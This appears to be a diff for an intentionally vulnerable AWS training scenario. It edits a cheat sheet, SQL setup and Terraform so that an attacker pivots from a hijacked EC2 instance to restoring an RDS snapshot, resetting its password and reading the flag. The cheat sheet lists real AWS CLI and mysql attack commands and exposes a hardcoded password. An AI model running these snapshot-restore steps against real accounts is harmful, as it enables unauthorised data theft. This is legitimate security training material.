Scenario/rds_snapshot issue

scenarios/rds_snapshot/assets/insert_data.sql

@@ -1,5 +1,5 @@
-CREATE DATABASE mydatabase;
-USE mydatabase;
+CREATE DATABASE cgdatabase;
+USE cgdatabase;
 CREATE TABLE flag (
   id INT AUTO_INCREMENT PRIMARY KEY,
   value VARCHAR(255) NOT NULL

scenarios/rds_snapshot/cheat_sheet.md

@@ -15,7 +15,7 @@ An attacker can gain access to a hijacked EC2 instance.
 ```
 
 
-An attacker can list AWS credentials on the server (enumirate)
+An attacker can list AWS credentials on the server 
 
 
 `aws sts get-caller-identity`
@@ -67,15 +67,17 @@ aws rds describe-db-instances --profile david
 aws rds describe-db-snapshots --db-instance-identifier cg-rds
 
 
+
 #Restore the RDS snapshot
 aws rds restore-db-instance-from-db-snapshot \
     --db-instance-identifier attack-rds \
     --db-snapshot-identifier cg-rds-snapshot \
     --db-subnet-group-name cg-db-subnet-group \
-    --vpc-security-group-ids sg-xxxxxxxxxxxxxxxxx \
+    --vpc-security-group-ids sg-038cc4ee5486e9c42 \
     --profile david
 
 
+
 #Wait for a new instance to be created
 
 
@@ -87,6 +89,7 @@ aws rds modify-db-instance \
     --profile david
 
 
+
 #Verify the master username
 aws rds describe-db-instances --db-instance-identifier attack-rds --query \ "DBInstances[.1].1
 "DBInstances[].MasterUsername" --profile david
@@ -99,10 +102,9 @@ aws rds describe-db-instances --db-instance-identifier attack-rds --query \ "DBI
 
 ```
 
-
 The attacker accesses the restored DB and hijacks the FLAG.
 ```
-mysql -h attack-rds.cxxxxxxxxxxx.us-east-1.rds.amazonaws.com -P 3306 -u cgadmin -pattack1234!
+mysql -h attack-rds.czunzahrebkl.us-east-1.rds.amazonaws.com -P 3306 -u cgadmin -pattack1234!
 show databases;
 use mydatabase;
 show tables;

scenarios/rds_snapshot/terraform/ec2.tf

@@ -1,5 +1,5 @@
 data "aws_ami" "ubuntu_image" {
-  owners      = ["amazon"]
+  owners      = ["099720109477"]
   most_recent = true
 
   filter {
@@ -65,6 +65,7 @@ resource "aws_instance" "cg-ec2-instance" {
     "sudo apt install python3-pip -y",
     "pip3 install --upgrade pip",
     "pip3 install awscli --upgrade --user",
+    "sudo apt-get update",
     "sudo apt-get install mysql-client -y",
     "cd /home/ubuntu",
     "mysql -h ${aws_db_instance.cg-rds-db_instance.address} -u ${var.rds-username} -p${var.rds-password} < /home/ubuntu/insert_data.sql",
@@ -79,3 +80,21 @@ resource "aws_instance" "cg-ec2-instance" {
     }
   }
 }
+resource "null_resource" "delete_data" {
+  triggers = {
+    snapshot_id = aws_db_snapshot.cg-rds_snapshot.id
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "mysql -h ${aws_db_instance.cg-rds-db_instance.address} -u ${var.rds-username} -p${var.rds-password} -D cgdatabase -e 'DROP TABLE flag;'"
+    ]
+
+    connection {
+      type        = "ssh"
+      user        = "ubuntu"
+      private_key = file(var.ssh-private-key-for-ec2)
+      host        = aws_instance.cg-ec2-instance.public_ip
+    }
+  }
+}